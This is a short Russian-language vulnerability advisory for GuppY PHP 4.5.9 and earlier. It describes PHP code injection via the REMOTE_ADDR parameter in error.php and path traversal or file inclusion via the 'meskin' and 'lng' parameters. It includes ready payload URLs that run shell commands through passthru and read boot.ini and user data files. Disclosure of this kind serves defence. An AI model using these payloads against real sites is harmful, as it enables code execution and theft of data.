Программа: GuppY PHP 4.5.9 и более ранние версии

Уязвимость позволяет удаленному пользователю получить доступ к потенциально
важным данным и выполнить произвольный PHP код на целевой системе с привилегиями
web сервера.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "_SERVER[REMOTE_ADDR]" в сценарии "error.php". Удаленный пользователь
может выполнить произвольный PHP код на целевой системе с привилегиями web
сервера. Удачная эксплуатация уязвимости возможна при включенной опции "register_globals"
и выключенном "magic_quotes_gpc" в конфигурационном файле PHP.

Пример:

http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=
&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"

Эксплоит

2. Уязвимость существует при обработке входных данных в параметре "meskin"
сценария "editorTypetool.php" и параметре "lng" в сценариях "archbatch.php" и "nwlmail.php".
удаленный пользователь может подключить и выполнить произвольный файл на
системе. Удачная эксплуатация уязвимости возможна при включенной опции "register_globals"
и выключенном "magic_quotes_gpc" в конфигурационном файле PHP.

Пример:

http://[target]/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..
%2F..%2F..%2F..%2F

http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?
lng=../../../../../../../../../../../

http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://[target]/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии